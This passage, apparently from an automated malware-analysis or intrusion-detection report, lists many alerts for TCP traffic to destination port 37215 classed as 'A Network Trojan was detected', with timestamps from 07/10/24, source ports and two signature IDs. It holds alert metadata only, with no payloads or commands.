                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.073634
                  SID:2829579
                  Source Port:50968
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.924774
                  SID:2829579
                  Source Port:38364
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.517321
                  SID:2835222
                  Source Port:56022
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.549975
                  SID:2835222
                  Source Port:34290
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.180724
                  SID:2829579
                  Source Port:49644
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.846155
                  SID:2829579
                  Source Port:56300
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.525977
                  SID:2835222
                  Source Port:36016
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.399244
                  SID:2829579
                  Source Port:45592
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.062110
                  SID:2829579
                  Source Port:53012
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.826034
                  SID:2829579
                  Source Port:58242
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.400410
                  SID:2835222
                  Source Port:59688
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.875517
                  SID:2835222
                  Source Port:49740
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.942131
                  SID:2835222
                  Source Port:39082
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.302858
                  SID:2829579
                  Source Port:43634
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.087235
                  SID:2829579
                  Source Port:41286
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.951263
                  SID:2835222
                  Source Port:53546
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.119674
                  SID:2835222
                  Source Port:42588
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.861470
                  SID:2835222
                  Source Port:40518
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.334233
                  SID:2835222
                  Source Port:44904
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.135907
                  SID:2835222
                  Source Port:55976
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.872861
                  SID:2835222
                  Source Port:57118
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.187450
                  SID:2829579
                  Source Port:52466
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.858579
                  SID:2829579
                  Source Port:50820
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.515772
                  SID:2835222
                  Source Port:34990
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:29.339499
                  SID:2829579
                  Source Port:42636
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.830759
                  SID:2829579
                  Source Port:38484
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.917896
                  SID:2835222
                  Source Port:35424
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.618232
                  SID:2829579
                  Source Port:37024
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.080592
                  SID:2835222
                  Source Port:58748
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.560985
                  SID:2835222
                  Source Port:36218
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.522162
                  SID:2835222
                  Source Port:41346
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.839511
                  SID:2829579
                  Source Port:34128
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.376838
                  SID:2829579
                  Source Port:49270
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.126835
                  SID:2829579
                  Source Port:46072
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.247589
                  SID:2829579
                  Source Port:37294
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.664230
                  SID:2829579
                  Source Port:55592
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.064753
                  SID:2829579
                  Source Port:38006
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.466916
                  SID:2829579
                  Source Port:49990
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.536337
                  SID:2829579
                  Source Port:51724
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.773841
                  SID:2829579
                  Source Port:33018
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.058367
                  SID:2829579
                  Source Port:56846
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.865384
                  SID:2829579
                  Source Port:51362
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.176118
                  SID:2829579
                  Source Port:38180
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.041240
                  SID:2835222
                  Source Port:33494
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.165104
                  SID:2829579
                  Source Port:54958
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.430749
                  SID:2829579
                  Source Port:38012
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.881781
                  SID:2835222
                  Source Port:49452
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.875941
                  SID:2829579
                  Source Port:48292
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.840118
                  SID:2835222
                  Source Port:32946
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.819826
                  SID:2835222
                  Source Port:47260
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.624667
                  SID:2829579
                  Source Port:35910
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.746108
                  SID:2835222
                  Source Port:33080
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.991529
                  SID:2835222
                  Source Port:49694
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.909155
                  SID:2829579
                  Source Port:55860
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.078172
                  SID:2835222
                  Source Port:35044
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.609289
                  SID:2835222
                  Source Port:34916
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.381033
                  SID:2829579
                  Source Port:35278
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.286567
                  SID:2835222
                  Source Port:48114
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.744458
                  SID:2835222
                  Source Port:52634
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.948398
                  SID:2829579
                  Source Port:43948
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.821130
                  SID:2829579
                  Source Port:34454
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.497334
                  SID:2829579
                  Source Port:56482
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.928939
                  SID:2835222
                  Source Port:50566
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.561915
                  SID:2835222
                  Source Port:54526
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.341806
                  SID:2829579
                  Source Port:58258
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.561451
                  SID:2835222
                  Source Port:33992
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.538222
                  SID:2829579
                  Source Port:37516
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.023936
                  SID:2835222
                  Source Port:40548
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.343615
                  SID:2829579
                  Source Port:39684
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.679759
                  SID:2829579
                  Source Port:53250
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.468453
                  SID:2829579
                  Source Port:45898
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.668696
                  SID:2835222
                  Source Port:56912
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.857125
                  SID:2829579
                  Source Port:47692
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.205582
                  SID:2835222
                  Source Port:52014
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.525834
                  SID:2829579
                  Source Port:49732
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.339308
                  SID:2829579
                  Source Port:43684
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.772069
                  SID:2835222
                  Source Port:46394
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.917440
                  SID:2835222
                  Source Port:59580
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.239596
                  SID:2829579
                  Source Port:37716
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.826024
                  SID:2829579
                  Source Port:57040
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.668684
                  SID:2829579
                  Source Port:57590
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.825094
                  SID:2829579
                  Source Port:50828
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.728066
                  SID:2829579
                  Source Port:36764
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.472197
                  SID:2835222
                  Source Port:42550
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:00.477021
                  SID:2829579
                  Source Port:52372
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:00.596679
                  SID:2829579
                  Source Port:59270
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.532375
                  SID:2835222
                  Source Port:40254
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.238192
                  SID:2835222
                  Source Port:35672
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.739373
                  SID:2835222
                  Source Port:33446
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.237897
                  SID:2829579
                  Source Port:48532
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.156857
                  SID:2829579
                  Source Port:36692
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.647317
                  SID:2835222
                  Source Port:52356
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.696239
                  SID:2829579
                  Source Port:50918
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.827026
                  SID:2829579
                  Source Port:51468
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.525787
                  SID:2835222
                  Source Port:58650
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.534381
                  SID:2829579
                  Source Port:47970
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.422877
                  SID:2829579
                  Source Port:59476
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.469878
                  SID:2835222
                  Source Port:44820
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.538525
                  SID:2829579
                  Source Port:37674
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.615423
                  SID:2835222
                  Source Port:52660
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.897517
                  SID:2829579
                  Source Port:55844
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.898943
                  SID:2835222
                  Source Port:44574
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.099598
                  SID:2829579
                  Source Port:49710
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.546157
                  SID:2829579
                  Source Port:43124
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.262115
                  SID:2829579
                  Source Port:34772
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.835821
                  SID:2835222
                  Source Port:58190
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.337851
                  SID:2829579
                  Source Port:35618
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.570253
                  SID:2829579
                  Source Port:43058
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.064237
                  SID:2829579
                  Source Port:34916
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.842120
                  SID:2829579
                  Source Port:33348
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.469526
                  SID:2829579
                  Source Port:57430
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.566781
                  SID:2829579
                  Source Port:53428
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.489960
                  SID:2829579
                  Source Port:52386
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.187886
                  SID:2835222
                  Source Port:50380
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.761571
                  SID:2835222
                  Source Port:41082
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.836491
                  SID:2835222
                  Source Port:36594
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.252785
                  SID:2835222
                  Source Port:38582
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.914278
                  SID:2829579
                  Source Port:59522
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.837410
                  SID:2829579
                  Source Port:39028
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.845496
                  SID:2835222
                  Source Port:48770
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.587142
                  SID:2835222
                  Source Port:39566
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.108861
                  SID:2835222
                  Source Port:56360
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.030599
                  SID:2835222
                  Source Port:43588
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.542480
                  SID:2835222
                  Source Port:50724
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.628339
                  SID:2829579
                  Source Port:34770
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.103882
                  SID:2835222
                  Source Port:40894
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.644111
                  SID:2835222
                  Source Port:52416
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.178483
                  SID:2829579
                  Source Port:49136
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.453696
                  SID:2829579
                  Source Port:43196
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.603231
                  SID:2835222
                  Source Port:40224
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.394343
                  SID:2829579
                  Source Port:42968
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.624081
                  SID:2835222
                  Source Port:46102
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.637224
                  SID:2829579
                  Source Port:56790
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.177713
                  SID:2835222
                  Source Port:42390
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.264722
                  SID:2829579
                  Source Port:49404
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.099903
                  SID:2835222
                  Source Port:43288
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.969982
                  SID:2835222
                  Source Port:33134
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.563036
                  SID:2829579
                  Source Port:56144
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.028986
                  SID:2829579
                  Source Port:49714
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.912225
                  SID:2829579
                  Source Port:45118
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.366132
                  SID:2835222
                  Source Port:51534
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.658661
                  SID:2829579
                  Source Port:38734
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.622181
                  SID:2829579
                  Source Port:35604
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.575207
                  SID:2835222
                  Source Port:53310
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.868387
                  SID:2835222
                  Source Port:60146
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.806534
                  SID:2835222
                  Source Port:55860
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.525834
                  SID:2835222
                  Source Port:58978
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.214237
                  SID:2829579
                  Source Port:51016
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.400410
                  SID:2829579
                  Source Port:37984
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.301288
                  SID:2835222
                  Source Port:35306
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.888134
                  SID:2835222
                  Source Port:51488
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.649292
                  SID:2835222
                  Source Port:42218
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.985576
                  SID:2835222
                  Source Port:57714
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.469392
                  SID:2829579
                  Source Port:36708
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.778157
                  SID:2829579
                  Source Port:43022
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.869834
                  SID:2835222
                  Source Port:52714
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.117679
                  SID:2835222
                  Source Port:43610
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.441916
                  SID:2835222
                  Source Port:58650
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.879112
                  SID:2835222
                  Source Port:38216
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.886880
                  SID:2835222
                  Source Port:36428
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.848848
                  SID:2829579
                  Source Port:37854
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.897517
                  SID:2829579
                  Source Port:55342
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.489783
                  SID:2835222
                  Source Port:37952
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.850187
                  SID:2829579
                  Source Port:47922
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.160478
                  SID:2835222
                  Source Port:59314
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.985108
                  SID:2835222
                  Source Port:45198
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.096875
                  SID:2835222
                  Source Port:52424
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.841867
                  SID:2835222
                  Source Port:41476
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.758583
                  SID:2835222
                  Source Port:32842
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.613127
                  SID:2835222
                  Source Port:34326
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.134313
                  SID:2835222
                  Source Port:60210
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.168887
                  SID:2835222
                  Source Port:56230
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.603545
                  SID:2835222
                  Source Port:49844
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.487331
                  SID:2835222
                  Source Port:36836
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.523582
                  SID:2829579
                  Source Port:45214
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.571545
                  SID:2829579
                  Source Port:42932
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.272664
                  SID:2829579
                  Source Port:41028
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.384397
                  SID:2835222
                  Source Port:35796
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.542221
                  SID:2835222
                  Source Port:52122
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.073471
                  SID:2829579
                  Source Port:54792
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.433645
                  SID:2835222
                  Source Port:44686
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.736311
                  SID:2835222
                  Source Port:59300
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.242541
                  SID:2829579
